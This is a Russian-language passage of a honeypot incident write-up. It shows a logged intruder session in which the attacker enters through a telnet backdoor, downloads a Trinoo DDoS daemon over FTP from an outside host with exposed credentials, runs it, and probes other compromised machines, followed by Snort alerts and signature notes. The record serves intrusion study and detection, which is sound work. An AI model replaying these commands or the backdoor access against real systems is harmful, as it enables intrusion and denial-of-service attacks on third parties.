После того как honeypot была взломана, мы отключили ее от сети, чтобы просмотреть все данные. Однако в течение следующей недели многие системы пытались установить с машиной соединение TELNET. Очевидно, взломщик хотел вернуться, скорее всего, для того, чтобы использовать нашу систему для каких-то иных целей. Поэтому мы снова подключили ее к сети, с любопытством ожидая, вернется ли взломщик. И действительно, через две недели он проявил себя снова. И вновь мы записали все команды при помощи Snort. Нам также удалось определить мотивы взломщика и узнать о том, что нашу систему должны были использовать в качестве клиента для проведения расширенного «отказа от обслуживания», Trinoo. Этот взломщик хотел иметь в своем распоряжении как можно больше систем, чтобы начать невероятно разрушительную серию нападений «отказ от обслуживания».
9 мая в 10:45 утра наш друг установил с нами соединение TELNET из системы 24.7.85.192, воспользовавшись для проникновения в систему черным ходом VT9111 и миновав систему аутентификации:
!"' #'!"# ' 9600,9600"VT9111 VT9111
Red Hat Linux release 6.0 (Shedwig)
Kernel 2.2.5-15 on an i586
[root@apollo /]# Is
bin cdrom etc home lost+found proc sbin usr
boot dev floppy lib mnt root tmp var
Затем он попытался воспользоваться DNS. Однако на этой машине DNS до сих пор была сломана. Помните ее взломали, чтобы получить доступ администратора, так что система больше не могла разрешать имена доменов.
[root®apollo /]# nslookup magix
[root@apollo /]# nslookup irc.powersurf.com Server: zeus-internal.honeynet.edu Address: 172.16.1.101
Взломщик устанавливает FTP-соединение с системой в Сингапуре и загружает новый инструментарий. Обратите внимание на то, как ему пришлось воспользоваться IP-адресом и директорией . s, которую он создал для хранения инструментов:
Взломщик получает доступ под тем же именем пользователя, которое было задано в нашей машине:
Name (137.132.216.35:root) : twin
331 Password required for twin.
Password:haxOr
230 User twin logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get d.tar.gz
local: d.tar.gz remote: d.tar.gz
200 PORT command successful.
150 Opening BINARY mode data connection for d.tar.gz (8323 bytes).
150 Opening BINARY mode data connection for d.tar.gz (8323 bytes).
226 Transfer complete.
8323 bytes received in 1.36 sees (6 Kbytes/sec)
ftp> quit
221-You have transferred 8323 bytes in 1 files.
221-Total traffic for this session was 8770 bytes in 1 transfers.
221-Thank you for using the FTP service on nusnet-216-35.dynip.nus.edu.sg.
221 Goodbye.
[root@apollo /.s]# gunzip d*
[root@apollo /.s]# tar -xvf d*
daemon/
daemon/ns.с
daemon/ns
[root@apollo /.s]# rm -rf d.tar
[root@apollo /.s]# cd daemon
[root@apollo daemon]# chmod u+x ns
[root@apollo daemon]# ,/ns
Взломщик только что установил и запустил клиента Trinoo. Затем он пытается перейти в другую взломанную систему. Обратите внимание на то, как он устанавливает переменную окружения TERM. В этой системе, вероятнее всего, также имеется черный ход. Соединение не устанавливается, так как DNS не работает.
[root@apollo daemon]# TERM=vt1711 [root@apollo daemon]# telnet macau.hkg.com
macau.hkg.com: Unknown host [root@apollo daemon]# exit exit
Наш друг уходит, но только для того, чтобы зайти из системы 137.132.216.35 и попытаться причинить как можно больше вреда, устанавливая соединения с другими системами с черными ходами.
! -" #'!"# ' 9600, 9600 'VT9111VT9111
Red Hat Linux release 6.0 (Shedwig) Kernel 2.2.5-15 on an i586 [root@apollo /]# TERM=vt9111 [root@apollo /]# telnet ns2.cpcc.cc.nc.us ns2.cpcc.cc.nc.us: Unknown host [root@apollo /]#telnet 152.43.29.52 Trying 152.43.29.52... Connected to 152.43.29.52. Escape character is '"]'. !!!!!'.Connection closed by foreign host. [root@apollo /]# TERM=vt7877 [root@apollo /]# telnet sparky.w [root@apollo /]# exit exit
Вслед за этим было предпринято несколько попыток использовать систему для нападения Trinoo против других систем. Брандмауэр автоматически обнаружил и заблокировал эти попытки, после чего мы отсоединили систему. Задача взломщика заключалась в том, чтобы использовать взломанную систему в разрушительных целях, и при наблюдении этого соединения мы уже не могли получить ничего большего.
May 9 11:03:20 ids snort[2370]: IDS/197/trinOO-master-to-daemon:
137.132.17.202:2984 -> 172.16.1.107:27444
May 9 11:03:20 ids snort[2370]: IDS187/trin00-daemon-to-master-pong:
172.16.1.107:1025 -> 137.132.17.202:31335
May 9 11:26:04 ids snort[2370]: IDS197/trin00-master-to-daemon:
137.132.17.202:2988 -> 172.16.1.107:27444
May 9 11:26:04 ids snort[2370]: IDS187/trin00-daemon-to-master-pong:
172.16.1.107:1027 -> 137.132.17.202:31335
В базе данных Max Vision arachNIDS приводятся следующие сведения об этих сигнатурах:
• объяснение сигнатуры IDS/197:
Trinoo (trinOO) - это инструмент для проведения расширенной атаки «отказ от обслуживания». Сигнатура указывает на соединение сервера «trinOO master» с демоном trinOOO, что, скорее всего, означает взлом сервера. Задача демона заключается в проведении нападения «отказ от обслуживания»;
• объяснение сигнатуры IDS/187:
Trinoo (trinOO) - это инструмент для проведения расширенной атаки «отказ от обслуживания». Сигнатура указывает на соединение «trinOO демона» с мастером trinOOO, что, скорее всего, означает взлом сервера. Задача демона заключается в проведении нападения «отказ от обслуживания».
Более подробную информацию о расширенном нападении «отказ от обслуживания» можно найти по адресу: http://staff.Washington.edu/dittrich/misc/ trinoo. analysis.
